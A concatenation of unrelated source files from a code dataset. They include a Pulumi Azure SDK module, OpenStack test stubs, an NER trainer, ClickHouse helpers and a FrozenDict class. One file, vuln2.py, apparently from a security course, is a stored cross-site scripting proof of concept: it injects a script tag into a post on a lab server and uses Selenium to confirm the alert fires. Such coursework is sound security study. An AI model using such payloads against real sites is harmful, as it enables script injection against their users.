] | null | null | null | sdk/python/pulumi_azure_nextgen/network/v20200301/get_express_route_gateway.py | test-wiz-sec/pulumi-azure-nextgen | 20a695af0d020b34b0f1c336e1b69702755174cc | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_nextgen/network/v20200301/get_express_route_gateway.py | test-wiz-sec/pulumi-azure-nextgen | 20a695af0d020b34b0f1c336e1b69702755174cc | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
__all__ = [
'GetExpressRouteGatewayResult',
'AwaitableGetExpressRouteGatewayResult',
'get_express_route_gateway',
]
@pulumi.output_type
class GetExpressRouteGatewayResult:
"""
ExpressRoute gateway resource.
"""
def __init__(__self__, auto_scale_configuration=None, etag=None, express_route_connections=None, location=None, name=None, provisioning_state=None, tags=None, type=None, virtual_hub=None):
if auto_scale_configuration and not isinstance(auto_scale_configuration, dict):
raise TypeError("Expected argument 'auto_scale_configuration' to be a dict")
pulumi.set(__self__, "auto_scale_configuration", auto_scale_configuration)
if etag and not isinstance(etag, str):
raise TypeError("Expected argument 'etag' to be a str")
pulumi.set(__self__, "etag", etag)
if express_route_connections and not isinstance(express_route_connections, list):
raise TypeError("Expected argument 'express_route_connections' to be a list")
pulumi.set(__self__, "express_route_connections", express_route_connections)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if virtual_hub and not isinstance(virtual_hub, dict):
raise TypeError("Expected argument 'virtual_hub' to be a dict")
pulumi.set(__self__, "virtual_hub", virtual_hub)
@property
@pulumi.getter(name="autoScaleConfiguration")
def auto_scale_configuration(self) -> Optional['outputs.ExpressRouteGatewayPropertiesResponseAutoScaleConfiguration']:
"""
Configuration for auto scaling.
"""
return pulumi.get(self, "auto_scale_configuration")
@property
@pulumi.getter
def etag(self) -> str:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter(name="expressRouteConnections")
def express_route_connections(self) -> Sequence['outputs.ExpressRouteConnectionResponse']:
"""
List of ExpressRoute connections to the ExpressRoute gateway.
"""
return pulumi.get(self, "express_route_connections")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The provisioning state of the express route gateway resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="virtualHub")
def virtual_hub(self) -> 'outputs.VirtualHubIdResponse':
"""
The Virtual Hub where the ExpressRoute gateway is or will be deployed.
"""
return pulumi.get(self, "virtual_hub")
class AwaitableGetExpressRouteGatewayResult(GetExpressRouteGatewayResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetExpressRouteGatewayResult(
auto_scale_configuration=self.auto_scale_configuration,
etag=self.etag,
express_route_connections=self.express_route_connections,
location=self.location,
name=self.name,
provisioning_state=self.provisioning_state,
tags=self.tags,
type=self.type,
virtual_hub=self.virtual_hub)
def get_express_route_gateway(express_route_gateway_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetExpressRouteGatewayResult:
"""
Use this data source to access information about an existing resource.
:param str express_route_gateway_name: The name of the ExpressRoute gateway.
:param str resource_group_name: The name of the resource group.
"""
__args__ = dict()
__args__['expressRouteGatewayName'] = express_route_gateway_name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-nextgen:network/v20200301:getExpressRouteGateway', __args__, opts=opts, typ=GetExpressRouteGatewayResult).value
return AwaitableGetExpressRouteGatewayResult(
auto_scale_configuration=__ret__.auto_scale_configuration,
etag=__ret__.etag,
express_route_connections=__ret__.express_route_connections,
location=__ret__.location,
name=__ret__.name,
provisioning_state=__ret__.provisioning_state,
tags=__ret__.tags,
type=__ret__.type,
virtual_hub=__ret__.virtual_hub)
| 38.258824 | 192 | 0.672817 |
795486ad2d13e726547293251d1914aea70a5628 | 4,378 | py | Python | cinder/tests/unit/api/v1/stubs.py | rackerlabs/cinder | 4295ff0a64f781c3546f6c6e0816dbb8100133cb | [
"Apache-2.0"
] | 1 | 2019-02-08T05:24:58.000Z | 2019-02-08T05:24:58.000Z | cinder/tests/unit/api/v1/stubs.py | rackerlabs/cinder | 4295ff0a64f781c3546f6c6e0816dbb8100133cb | [
"Apache-2.0"
] | 1 | 2021-03-21T11:38:29.000Z | 2021-03-21T11:38:29.000Z | cinder/tests/unit/api/v1/stubs.py | rackerlabs/cinder | 4295ff0a64f781c3546f6c6e0816dbb8100133cb | [
"Apache-2.0"
] | 15 | 2017-01-12T10:35:10.000Z | 2019-04-19T08:22:10.000Z | # Copyright 2010 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
from cinder import exception as exc
FAKE_UUID = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
FAKE_UUIDS = {}
def stub_volume(id, **kwargs):
volume = {
'id': id,
'user_id': 'fakeuser',
'project_id': 'fakeproject',
'host': 'fakehost',
'size': 1,
'availability_zone': 'fakeaz',
'attached_mode': 'rw',
'status': 'fakestatus',
'migration_status': None,
'attach_status': 'attached',
'bootable': 'false',
'name': 'vol name',
'display_name': 'displayname',
'display_description': 'displaydesc',
'created_at': datetime.datetime(1, 1, 1, 1, 1, 1),
'snapshot_id': None,
'source_volid': None,
'volume_type_id': '3e196c20-3c06-11e2-81c1-0800200c9a66',
'volume_metadata': [],
'volume_type': {'name': 'vol_type_name'},
'volume_attachment': [],
'multiattach': False,
'readonly': 'False'}
volume.update(kwargs)
return volume
def stub_volume_create(self, context, size, name, description, snapshot,
**param):
vol = stub_volume('1')
vol['size'] = size
vol['display_name'] = name
vol['display_description'] = description
vol['source_volid'] = None
try:
vol['snapshot_id'] = snapshot['id']
except (KeyError, TypeError):
vol['snapshot_id'] = None
vol['availability_zone'] = param.get('availability_zone', 'fakeaz')
return vol
def stub_volume_create_from_image(self, context, size, name, description,
snapshot, volume_type, metadata,
availability_zone):
vol = stub_volume('1')
vol['status'] = 'creating'
vol['size'] = size
vol['display_name'] = name
vol['display_description'] = description
vol['availability_zone'] = 'cinder'
return vol
def stub_volume_update(self, context, *args, **param):
pass
def stub_volume_delete(self, context, *args, **param):
pass
def stub_volume_get(self, context, volume_id):
return stub_volume(volume_id)
def stub_volume_get_notfound(self, context, volume_id):
raise exc.NotFound
def stub_volume_get_all(context, search_opts=None):
return [stub_volume(100, project_id='fake'),
stub_volume(101, project_id='superfake'),
stub_volume(102, project_id='superduperfake')]
def stub_volume_get_all_by_project(self, context, search_opts=None):
return [stub_volume_get(self, context, '1')]
def stub_snapshot(id, **kwargs):
snapshot = {'id': id,
'volume_id': 12,
'status': 'available',
'volume_size': 100,
'created_at': None,
'display_name': 'Default name',
'display_description': 'Default description',
'project_id': 'fake',
'snapshot_metadata': []}
snapshot.update(kwargs)
return snapshot
def stub_snapshot_get_all(context, filters=None, marker=None, limit=None,
sort_keys=None, sort_dirs=None, offset=None):
return [stub_snapshot(100, project_id='fake'),
stub_snapshot(101, project_id='superfake'),
stub_snapshot(102, project_id='superduperfake')]
def stub_snapshot_get_all_by_project(context, project_id, filters=None,
marker=None, limit=None, sort_keys=None,
sort_dirs=None, offset=None):
return [stub_snapshot(1)]
def stub_snapshot_update(self, context, *args, **param):
pass
def stub_service_get_all_by_topic(context, topic, disabled=None):
return [{'availability_zone': "zone1:host1", "disabled": 0}]
| 31.049645 | 78 | 0.624486 |
7954888bb3db3ac4ba9dc45e1f2b98e4f3e441db | 4,137 | py | Python | main.py | monologg/CNN-BiLSTM-CRF-NER | 140b23eb5f583050dc39c9648028115ba4b75f09 | [
"Apache-2.0"
] | 16 | 2020-03-22T08:20:42.000Z | 2022-03-16T03:59:40.000Z | main.py | monologg/CNN-BiLSTM-CRF-NER | 140b23eb5f583050dc39c9648028115ba4b75f09 | [
"Apache-2.0"
] | null | null | null | main.py | monologg/CNN-BiLSTM-CRF-NER | 140b23eb5f583050dc39c9648028115ba4b75f09 | [
"Apache-2.0"
] | 8 | 2020-11-23T11:00:12.000Z | 2022-03-31T03:03:54.000Z | import argparse
from trainer import Trainer
from utils import init_logger, build_vocab, download_w2v
from data_loader import load_examples
def main(args):
init_logger()
if not args.no_w2v:
download_w2v(args)
build_vocab(args)
train_dataset = load_examples(args, mode="train")
dev_dataset = None
test_dataset = load_examples(args, mode="test")
trainer = Trainer(args, train_dataset, dev_dataset, test_dataset)
if args.do_train:
trainer.train()
if args.do_eval:
trainer.load_model()
trainer.evaluate("test", "eval")
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--data_dir", default="./data", type=str, help="The input data dir")
parser.add_argument("--model_dir", default="./model", type=str, help="Path for saving model")
parser.add_argument("--wordvec_dir", default="./wordvec", type=str, help="Path for pretrained word vector")
parser.add_argument("--vocab_dir", default="./vocab", type=str)
parser.add_argument("--pred_dir", default="./preds", type=str, help="The prediction file dir")
parser.add_argument("--train_file", default="train.tsv", type=str, help="Train file")
parser.add_argument("--test_file", default="test.tsv", type=str, help="Test file")
parser.add_argument("--label_file", default="label.txt", type=str, help="Label file")
parser.add_argument("--w2v_file", default="word_vector_300d.vec", type=str, help="Pretrained word vector file")
parser.add_argument("--write_pred", action="store_true", help="Write prediction during evaluation")
parser.add_argument("--max_seq_len", default=50, type=int, help="Max sentence length")
parser.add_argument("--max_word_len", default=10, type=int, help="Max word length")
parser.add_argument("--word_vocab_size", default=100000, type=int, help="Maximum size of word vocabulary")
parser.add_argument("--char_vocab_size", default=1000, type=int, help="Maximum size of character vocabulary")
parser.add_argument("--word_emb_dim", default=300, type=int, help="Word embedding size")
parser.add_argument("--char_emb_dim", default=30, type=int, help="Character embedding size")
parser.add_argument("--final_char_dim", default=50, type=int, help="Dimension of character cnn output")
parser.add_argument("--hidden_dim", default=350, type=int, help="Dimension of BiLSTM output")
parser.add_argument("--kernel_lst", default="2,3,4", type=str, help="kernel size for character cnn")
parser.add_argument("--num_filters", default=32, type=int, help=" Number of filters for character cnn")
parser.add_argument('--seed', type=int, default=42, help="random seed for initialization")
parser.add_argument("--train_batch_size", default=64, type=int, help="Batch size for training")
parser.add_argument("--eval_batch_size", default=128, type=int, help="Batch size for evaluation")
parser.add_argument("--learning_rate", default=0.005, type=float, help="The initial learning rate")
parser.add_argument("--num_train_epochs", default=15.0, type=float, help="Total number of training epochs to perform.")
parser.add_argument("--slot_pad_label", default="PAD", type=str, help="Pad token for slot label pad (to be ignore when calculate loss)")
parser.add_argument("--ignore_index", default=0, type=int,
help='Specifies a target value that is ignored and does not contribute to the input gradient')
parser.add_argument('--logging_steps', type=int, default=1200, help="Log every X updates steps.")
parser.add_argument('--save_steps', type=int, default=1200, help="Save checkpoint every X updates steps.")
parser.add_argument("--do_train", action="store_true", help="Whether to run training.")
parser.add_argument("--do_eval", action="store_true", help="Whether to run eval on the test set.")
parser.add_argument("--no_cuda", action="store_true", help="Avoid using CUDA when available")
parser.add_argument("--no_w2v", action="store_true", help="Not loading pretrained word vector")
args = parser.parse_args()
main(args)
| 54.434211 | 140 | 0.716945 |
795488bdd91b94873278d8d304ecd7aa2951f2b4 | 875 | py | Python | backend/api/btb/api/schema/resolvers/company_by_id.py | serben/project-c | af7d5815fbf6d427b0f414338cee060b0b04ab65 | [
"MIT"
] | 4 | 2020-04-30T16:11:24.000Z | 2020-06-02T10:08:07.000Z | backend/api/btb/api/schema/resolvers/company_by_id.py | serben/project-c | af7d5815fbf6d427b0f414338cee060b0b04ab65 | [
"MIT"
] | 291 | 2020-04-20T13:11:13.000Z | 2022-02-10T21:54:46.000Z | backend/api/btb/api/schema/resolvers/company_by_id.py | serben/project-c | af7d5815fbf6d427b0f414338cee060b0b04ab65 | [
"MIT"
] | 2 | 2020-04-19T14:56:01.000Z | 2020-04-19T18:09:34.000Z | from graphene import ID, String, ObjectType
from btb.api.models import db
from sqlalchemy import text
from promise import Promise
from promise.dataloader import DataLoader
from flask import current_app, g
class CompanyLoader(DataLoader):
def batch_load_fn(self, keys):
current_app.logger.debug("load %s", keys)
with db.engine.begin() as conn:
sql = text("select * from btb.company_with_contact where id = any(cast(:keys as uuid[]))")
data = conn.execute(sql, keys=keys)
d = {str(i["id"]): i for i in data}
# must return result in same order
return Promise.resolve([d.get(str(id), None) for id in keys])
def company_by_id(root, info, id=None):
id = root["company_id"] if id is None else id
current_app.logger.debug("load %s", id)
return g.company_loader.load(id)
| 30.172414 | 102 | 0.657143 |
795488f529310ef95820f937390a2a41c5a29d6b | 2,465 | py | Python | nova/cert/manager.py | vmthunder/nova | baf05caab705c5778348d9f275dc541747b7c2de | [
"Apache-2.0"
] | 7 | 2015-09-22T11:27:16.000Z | 2015-11-02T12:33:46.000Z | nova/cert/manager.py | vmthunder/nova | baf05caab705c5778348d9f275dc541747b7c2de | [
"Apache-2.0"
] | 9 | 2015-05-20T11:20:17.000Z | 2017-07-27T08:21:33.000Z | nova/cert/manager.py | vmthunder/nova | baf05caab705c5778348d9f275dc541747b7c2de | [
"Apache-2.0"
] | 13 | 2015-05-05T09:34:04.000Z | 2017-11-08T02:03:46.000Z | # Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Cert manager manages x509 certificates.
**Related Flags**
:cert_topic: What :mod:`rpc` topic to listen to (default: `cert`).
:cert_manager: The module name of a class derived from
:class:`manager.Manager` (default:
:class:`nova.cert.manager.Manager`).
"""
import base64
from oslo import messaging
from nova import crypto
from nova import manager
class CertManager(manager.Manager):
target = messaging.Target(version='2.0')
def __init__(self, *args, **kwargs):
super(CertManager, self).__init__(service_name='cert',
*args, **kwargs)
def init_host(self):
crypto.ensure_ca_filesystem()
def revoke_certs_by_user(self, context, user_id):
"""Revoke all user certs."""
return crypto.revoke_certs_by_user(user_id)
def revoke_certs_by_project(self, context, project_id):
"""Revoke all project certs."""
return crypto.revoke_certs_by_project(project_id)
def revoke_certs_by_user_and_project(self, context, user_id, project_id):
"""Revoke certs for user in project."""
return crypto.revoke_certs_by_user_and_project(user_id, project_id)
def generate_x509_cert(self, context, user_id, project_id):
"""Generate and sign a cert for user in project."""
return crypto.generate_x509_cert(user_id, project_id)
def fetch_ca(self, context, project_id):
"""Get root ca for a project."""
return crypto.fetch_ca(project_id)
def fetch_crl(self, context, project_id):
"""Get crl for a project."""
return crypto.fetch_crl(project_id)
def decrypt_text(self, context, project_id, text):
"""Decrypt base64 encoded text using the projects private key."""
return crypto.decrypt_text(project_id, base64.b64decode(text))
| 34.71831 | 78 | 0.687221 |
795489bccac3aa363244ac1ebc6cf358d09d1379 | 801 | py | Python | migrations/versions/9a1c299f53be_adding_role.py | oodennis20/Blogs | 074338a69db1d759eb9050138c99b8abbb492cd2 | [
"MIT"
] | null | null | null | migrations/versions/9a1c299f53be_adding_role.py | oodennis20/Blogs | 074338a69db1d759eb9050138c99b8abbb492cd2 | [
"MIT"
] | null | null | null | migrations/versions/9a1c299f53be_adding_role.py | oodennis20/Blogs | 074338a69db1d759eb9050138c99b8abbb492cd2 | [
"MIT"
] | 1 | 2019-12-06T05:05:44.000Z | 2019-12-06T05:05:44.000Z | """adding role
Revision ID: 9a1c299f53be
Revises: f4ae7abcdaa4
Create Date: 2019-12-01 09:02:51.067454
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '9a1c299f53be'
down_revision = 'f4ae7abcdaa4'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('blogs', sa.Column('content', sa.String(length=255), nullable=True))
op.drop_column('blogs', 'blog')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('blogs', sa.Column('blog', sa.VARCHAR(length=255), autoincrement=False, nullable=True))
op.drop_column('blogs', 'content')
# ### end Alembic commands ###
| 25.83871 | 105 | 0.692884 |
795489cf7a20bb5caa99f3a97df23e37e35ac3a2 | 2,291 | py | Python | ee/clickhouse/models/util.py | zegl/posthog | 62846fd565e9eb6ff299bb81dd3b91f219bd0eeb | [
"MIT"
] | 1 | 2020-12-08T04:04:52.000Z | 2020-12-08T04:04:52.000Z | ee/clickhouse/models/util.py | zegl/posthog | 62846fd565e9eb6ff299bb81dd3b91f219bd0eeb | [
"MIT"
] | null | null | null | ee/clickhouse/models/util.py | zegl/posthog | 62846fd565e9eb6ff299bb81dd3b91f219bd0eeb | [
"MIT"
] | null | null | null | import json
from typing import Optional, Union
import pytz
from dateutil.parser import isoparse
from django.utils import timezone
from posthog.models.property import Property
def get_operator(prop: Property, arg: str):
operator = prop.operator
if operator == "is_not":
return "(trim(BOTH '\"' FROM ep.value) = %({})s)".format(arg), prop.value
elif operator == "icontains" or operator == "not_icontains":
value = "%{}%".format(prop.value)
return "(trim(BOTH '\"' FROM ep.value) LIKE %({})s)".format(arg), value
elif operator == "regex" or operator == "not_regex":
return "match(trim(BOTH '\"' FROM ep.value), %({})s)".format(arg), prop.value
elif operator == "is_set":
return "", prop.value
elif operator == "is_not_set":
return "", prop.value
elif operator == "gt":
return (
"(toInt64(trim(BOTH '\"' FROM ep.value)) > %({})s)".format(arg),
prop.value,
)
elif operator == "lt":
return (
"(toInt64(trim(BOTH '\"' FROM ep.value)) < %({})s)".format(arg),
prop.value,
)
else:
if is_json(prop.value):
return (
"replaceRegexpAll(trim(BOTH '\"' FROM ep.value),' ', '') = replaceRegexpAll(toString(%({})s),' ', '')".format(
arg
),
prop.value,
)
else:
return (
"(trim(BOTH '\"' FROM ep.value) = toString(%({})s))".format(arg),
prop.value,
)
def is_json(val):
if isinstance(val, int):
return False
try:
json.loads(val)
except ValueError:
return False
return True
def is_int(value: Optional[Union[str, int]]) -> bool:
try:
int(value) # type: ignore
except (ValueError, TypeError):
return False
else:
return True
def cast_timestamp_or_now(timestamp: Optional[Union[timezone.datetime, str]]) -> str:
if not timestamp:
timestamp = timezone.now()
# clickhouse specific formatting
if isinstance(timestamp, str):
timestamp = isoparse(timestamp)
else:
timestamp = timestamp.astimezone(pytz.utc)
return timestamp.strftime("%Y-%m-%d %H:%M:%S.%f")
| 28.283951 | 126 | 0.55347 |
79548a16e042f2aa938ddd2f709a78ec6e09d678 | 467 | py | Python | src/dashboard/settings.py | karlicoss/dashboard | 708eb183130de31e344fa0f38fa8ae74d1953e31 | [
"MIT"
] | 13 | 2020-08-26T06:25:00.000Z | 2021-07-23T13:54:19.000Z | src/dashboard/settings.py | karlicoss/dashboard | 708eb183130de31e344fa0f38fa8ae74d1953e31 | [
"MIT"
] | null | null | null | src/dashboard/settings.py | karlicoss/dashboard | 708eb183130de31e344fa0f38fa8ae74d1953e31 | [
"MIT"
] | null | null | null | from bokeh.themes import Theme
# https://docs.bokeh.org/en/latest/docs/reference/themes.html
# eh. kind of crappy (I'd much rather prefer python native way of overriding), but at least it works
# Legend.location.property._default = 'top_left' -- didn't work
theme = Theme(json={
'attrs' : {
'Legend': {
'location' : 'top_left',
'orientation' : 'horizontal',
'click_policy': 'hide', # todo 'mute'?
}
}
})
| 33.357143 | 100 | 0.605996 |
79548abfa8ee2ee90425119d3ed259d2e61d908f | 7,897 | py | Python | pyfda/frozendict.py | toddrme2178/pyfda | c20355fb36ace6902aebd1a6bc6c1a71771b84f4 | [
"MIT"
] | 1 | 2019-04-28T15:50:55.000Z | 2019-04-28T15:50:55.000Z | pyfda/frozendict.py | toddrme2178/pyfda | c20355fb36ace6902aebd1a6bc6c1a71771b84f4 | [
"MIT"
] | null | null | null | pyfda/frozendict.py | toddrme2178/pyfda | c20355fb36ace6902aebd1a6bc6c1a71771b84f4 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# This file is part of the pyFDA project hosted at https://github.com/chipmuenk/pyfda
#
# Copyright © pyFDA Project Contributors
# Licensed under the terms of the MIT License
# (see file LICENSE in root directory for details)
"""
Create an immutable dictionary for the filter tree. The eliminates the risk
that a filter design routine inadvertedly modifies the dict e.g. via
a shallow copy. Used by filterbroker.py and filter_tree_builder.py
Taken from http://stackoverflow.com/questions/2703599/what-would-a-frozen-dict-be
"""
if 3 / 2 == 1:
version = 2
else:
version = 3
def col(i):
''' For binding named attributes to spots inside subclasses of tuple.'''
g = tuple.__getitem__
@property
def _col(self):
return g(self,i)
return _col
#--------------------------------------------------------------------------
def freeze_hierarchical(hier_dict):
"""
Return the argumenent as a FrozenDict where all nested dicts have also been
converted to FrozenDicts recursively. When the argument is not a dict,
return the argument unchanged.
"""
if isinstance(hier_dict, dict):
for k in hier_dict:
if isinstance(hier_dict[k], dict):
hier_dict[k] = freeze_hierarchical(hier_dict[k])
return FrozenDict(hier_dict)
else:
return(hier_dict)
class Item(tuple):
''' Designed for storing key-value pairs inside
a FrozenDict, which itself is a subclass of frozenset.
The __hash__ is overloaded to return the hash of only the key.
__eq__ is overloaded so that normally it only checks whether the Item's
key is equal to the other object, HOWEVER, if the other object itself
is an instance of Item, it checks BOTH the key and value for equality.
WARNING: Do not use this class for any purpose other than to contain
key value pairs inside FrozenDict!!!!
The __eq__ operator is overloaded in such a way that it violates a
fundamental property of mathematics. That property, which says that
a == b and b == c implies a == c, does not hold for this object.
Here's a demonstration:
[in] >>> x = Item(('a',4))
[in] >>> y = Item(('a',5))
[in] >>> hash('a')
[out] >>> 194817700
[in] >>> hash(x)
[out] >>> 194817700
[in] >>> hash(y)
[out] >>> 194817700
[in] >>> 'a' == x
[out] >>> True
[in] >>> 'a' == y
[out] >>> True
[in] >>> x == y
[out] >>> False
'''
__slots__ = ()
key, value = col(0), col(1)
def __hash__(self):
return hash(self.key)
def __eq__(self, other):
if isinstance(other, Item):
return tuple.__eq__(self, other)
return self.key == other
def __ne__(self, other):
return not self.__eq__(other)
def __str__(self):
return '%r: %r' % self
def __repr__(self):
return 'Item((%r, %r))' % self
class FrozenDict(frozenset):
''' Behaves in most ways like a regular dictionary, except that it's immutable.
It differs from other implementations because it doesn't subclass "dict".
Instead it subclasses "frozenset" which guarantees immutability.
FrozenDict instances are created with the same arguments used to initialize
regular dictionaries, and has all the same methods.
[in] >>> f = FrozenDict(x=3,y=4,z=5)
[in] >>> f['x']
[out] >>> 3
[in] >>> f['a'] = 0
[out] >>> TypeError: 'FrozenDict' object does not support item assignment
FrozenDict can accept un-hashable values, but FrozenDict is only hashable if its values are hashable.
[in] >>> f = FrozenDict(x=3,y=4,z=5)
[in] >>> hash(f)
[out] >>> 646626455
[in] >>> g = FrozenDict(x=3,y=4,z=[])
[in] >>> hash(g)
[out] >>> TypeError: unhashable type: 'list'
FrozenDict interacts with dictionary objects as though it were a dict itself.
[in] >>> original = dict(x=3,y=4,z=5)
[in] >>> frozen = FrozenDict(x=3,y=4,z=5)
[in] >>> original == frozen
[out] >>> True
FrozenDict supports bi-directional conversions with regular dictionaries.
[in] >>> original = {'x': 3, 'y': 4, 'z': 5}
[in] >>> FrozenDict(original)
[out] >>> FrozenDict({'x': 3, 'y': 4, 'z': 5})
[in] >>> dict(FrozenDict(original))
[out] >>> {'x': 3, 'y': 4, 'z': 5} '''
__slots__ = ()
def __new__(cls, orig={}, **kw):
if kw:
d = dict(orig, **kw)
items = map(Item, d.items())
else:
try:
items = map(Item, orig.items())
except AttributeError:
items = map(Item, orig)
return frozenset.__new__(cls, items)
def __repr__(self):
cls = self.__class__.__name__
items = frozenset.__iter__(self)
_repr = ', '.join(map(str,items))
return '%s({%s})' % (cls, _repr)
def __getitem__(self, key):
if key not in self:
raise KeyError(key)
diff = self.difference
item = diff(diff({key}))
key, value = set(item).pop()
return value
def get(self, key, default=None):
if key not in self:
return default
return self[key]
def __iter__(self):
items = frozenset.__iter__(self)
return map(lambda i: i.key, items)
def keys(self):
items = frozenset.__iter__(self)
return map(lambda i: i.key, items)
def values(self):
items = frozenset.__iter__(self)
return map(lambda i: i.value, items)
def items(self):
items = frozenset.__iter__(self)
return map(tuple, items)
def copy(self):
cls = self.__class__
items = frozenset.copy(self)
dupl = frozenset.__new__(cls, items)
return dupl
@classmethod
def fromkeys(cls, keys, value):
d = dict.fromkeys(keys,value)
return cls(d)
def __hash__(self):
kv = tuple.__hash__
items = frozenset.__iter__(self)
return hash(frozenset(map(kv, items)))
def __eq__(self, other):
if not isinstance(other, FrozenDict):
try:
other = FrozenDict(other)
except Exception:
return False
return frozenset.__eq__(self, other)
def __ne__(self, other):
return not self.__eq__(other)
if version == 2:
#Here are the Python2 modifications
class Python2(FrozenDict):
def __iter__(self):
items = frozenset.__iter__(self)
for i in items:
yield i.key
def iterkeys(self):
items = frozenset.__iter__(self)
for i in items:
yield i.key
def itervalues(self):
items = frozenset.__iter__(self)
for i in items:
yield i.value
def iteritems(self):
items = frozenset.__iter__(self)
for i in items:
yield (i.key, i.value)
def has_key(self, key):
return key in self
def viewkeys(self):
return dict(self).viewkeys()
def viewvalues(self):
return dict(self).viewvalues()
def viewitems(self):
return dict(self).viewitems()
#If this is Python2, rebuild the class
#from scratch rather than use a subclass
py3 = FrozenDict.__dict__
py3 = {k: py3[k] for k in py3}
py2 = {}
py2.update(py3)
dct = Python2.__dict__
py2.update({k: dct[k] for k in dct})
FrozenDict = type('FrozenDict', (frozenset,), py2) | 32.364754 | 109 | 0.559959 |
79548b3a3835c0086447f8255cc110ef6cdbe50a | 1,783 | py | Python | project_1/pentest/vuln2.py | BFreitas16/SSof | c6963b76c1c033324593a40139e5918ad6386380 | [
"MIT"
] | null | null | null | project_1/pentest/vuln2.py | BFreitas16/SSof | c6963b76c1c033324593a40139e5918ad6386380 | [
"MIT"
] | null | null | null | project_1/pentest/vuln2.py | BFreitas16/SSof | c6963b76c1c033324593a40139e5918ad6386380 | [
"MIT"
] | null | null | null | import requests, sys, os, random
import time
from bs4 import BeautifulSoup
from selenium_utils import start_driver, write_to_field
SERVER = sys.argv[1]
# SERVER = 'http://d39e092608f9769e2696bf07d987072b4b2dd1dc9bce5e0151910fc276ae.project.ssof.rnl.tecnico.ulisboa.pt/'
session = requests.session()
# Random user credentials
user = str(random.randint(2**27, 2**28))
password = str(random.randint(2**27, 2**28))
# Registration of the user
params = {'password' : password, 'username' : user}
r = session.post(SERVER + '/register', data=params)
# Login of the user
params = {'password' : password, 'username' : user}
r = session.post(SERVER + '/login', data=params, cookies=session.cookies)
# Create a new post
params = {}
headers = {'user-agent': 'my-app/0.0.1', 'Content-Type': 'application/json'}
r = requests.get(SERVER + '/create_post', params=params, headers=headers, cookies=session.cookies)
params = {'content' : 'New Post', 'type' : 'Public'}
r = session.post(SERVER + '/create_post', data=params, cookies=session.cookies)
# Edit the newly created post
r = requests.get(SERVER, params={}, headers=headers, cookies=session.cookies)
soup = BeautifulSoup(r.text, 'html.parser')
created_post_id = int(soup.find_all('input')[0]['value'])
content = '</a><script>alert(1);</script>'
payload = {
'id': created_post_id,
'content': content,
'type': 'Public'
}
r = session.post(SERVER + '/edit_post', data=payload, cookies=session.cookies)
# Use Selenium to check for the alert
driver = start_driver()
driver.get(SERVER)
# Login
write_to_field(driver, 'username', user)
write_to_field(driver, 'password', password + '\n')
# Verify and Handle alert
alert = driver.switch_to.alert
time.sleep(1)
assert "1" in alert.text
alert.accept()
# Close Chrome
driver.close() | 30.220339 | 117 | 0.719574 |
79548b3b4245cb395a275c85e4e32b13c388fc3b | 644 | py | Python | src/netcheck/__init__.py | vincentdavis/Encrypted-Twitter-Messager | b43f553c26a733496a0a445d04d14aeb40e492f7 | [
"MIT"
] | null | null | null | src/netcheck/__init__.py | vincentdavis/Encrypted-Twitter-Messager | b43f553c26a733496a0a445d04d14aeb40e492f7 | [
"MIT"
] | null | null | null | src/netcheck/__init__.py | vincentdavis/Encrypted-Twitter-Messager | b43f553c26a733496a0a445d04d14aeb40e492f7 | [
"MIT"
] | null | null | null | from kivy import platform
__all__ = ('connection_available', 'set_retry_prompt', 'ask_connect',
'_get_ref')
_Netcheck = None
